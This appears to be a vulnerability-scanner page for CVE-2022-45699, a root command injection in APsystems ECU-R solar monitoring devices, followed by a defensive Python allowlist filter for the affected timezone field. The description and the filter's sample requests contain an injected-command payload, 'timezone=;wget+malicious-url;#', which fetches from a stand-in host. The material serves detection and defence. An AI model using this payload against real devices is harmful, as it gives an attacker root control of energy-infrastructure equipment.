CVE-2022-45699 Scanner
CVE-2022-45699 Scanner – Detects command injection via timezone parameter in APsystems ECU-R v5203
Short Info
Level
Single Scan
Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 8 days 6 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -
APsystems ECU-R is an energy monitoring and communication device used in photovoltaic (solar power) systems. It manages and communicates with microinverters to monitor system performance. These devices are typically exposed on local or remote networks for administrative access.
This scanner targets a critical remote command injection vulnerability (CVE-2022-45699) present in ECU-R firmware version 5203. The flaw resides in the administration web interface, specifically the `/index.php/management/set_timezone` endpoint. The `timezone` parameter is improperly sanitized, allowing remote, unauthenticated attackers to inject and execute arbitrary system commands as **root**.
Exploitation involves sending a crafted POST request with a payload injected into the `timezone` field (e.g., `timezone=;wget+malicious-url;#`). This payload is directly interpreted by the system shell, leading to full remote code execution. The scanner confirms exploitation via [interactsh](https://github.com/projectdiscovery/interactsh) integration by checking for out-of-band HTTP interactions.
Successful exploitation can result in full device compromise, including modification of configurations, installation of backdoors, and pivoting within the local network. Because the device is often deployed in critical energy infrastructure, this vulnerability poses a significant security risk.
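An added example, not part of the scanner or of the ECU-R firmware: a request check that a filtering proxy in front of the admin interface could apply, letting `set_timezone` through only when `timezone` has the shape of a zone name. The function names, the regular expression and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

ENDPOINT = "/index.php/management/set_timezone"  # endpoint named on this page
# Assumed shape of a zone name such as "Europe/Amsterdam" or "Etc/GMT+1":
# up to three "/"-separated parts, no whitespace or shell metacharacters.
TZ_NAME = re.compile(r"[A-Za-z][A-Za-z0-9_+-]{0,31}(/[A-Za-z0-9_+-]{1,32}){0,2}")


def check_request(method, path, body):
    """Return (verdict, detail) for one HTTP request.

    verdict is "ignore" (not a POST to set_timezone), "allow" (timezone
    looks like a zone name) or "block" (anything else).
    """
    if method.upper() != "POST" or path.split("?", 1)[0].rstrip("/") != ENDPOINT:
        return ("ignore", "")
    # Form decoding turns "+" into a space and "%2F" into "/", so the check
    # runs on the value the application would actually receive.
    fields = parse_qs(body, keep_blank_values=True, separator="&")
    values = fields.get("timezone", [])
    if len(values) != 1:
        return ("block", "expected one timezone field, got %d" % len(values))
    value = values[0]
    if not TZ_NAME.fullmatch(value):
        return ("block", "timezone is not a zone name: %r" % value)
    return ("allow", value)


# Constructed sample requests (method, path, form body). The second body is
# the payload shape quoted on this page.
SAMPLES = [
    ("POST", ENDPOINT, "timezone=Europe%2FAmsterdam"),
    ("POST", ENDPOINT, "timezone=;wget+malicious-url;#"),
    ("POST", ENDPOINT, "timezone=Etc/GMT%2B1"),
    ("POST", ENDPOINT, "timezone=UTC&timezone=Asia/Tokyo"),
    ("GET", "/index.php/home", ""),
]


def triage(samples=SAMPLES):
    """Verdicts for the sample requests, in order."""
    return [check_request(*sample)[0] for sample in samples]


if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[2] or sample[1], "->", check_request(*sample))
```

The check is an allowlist on the decoded value rather than a blocklist of shell characters, so a blocked request to this endpoint is also a useful alert for the device owner.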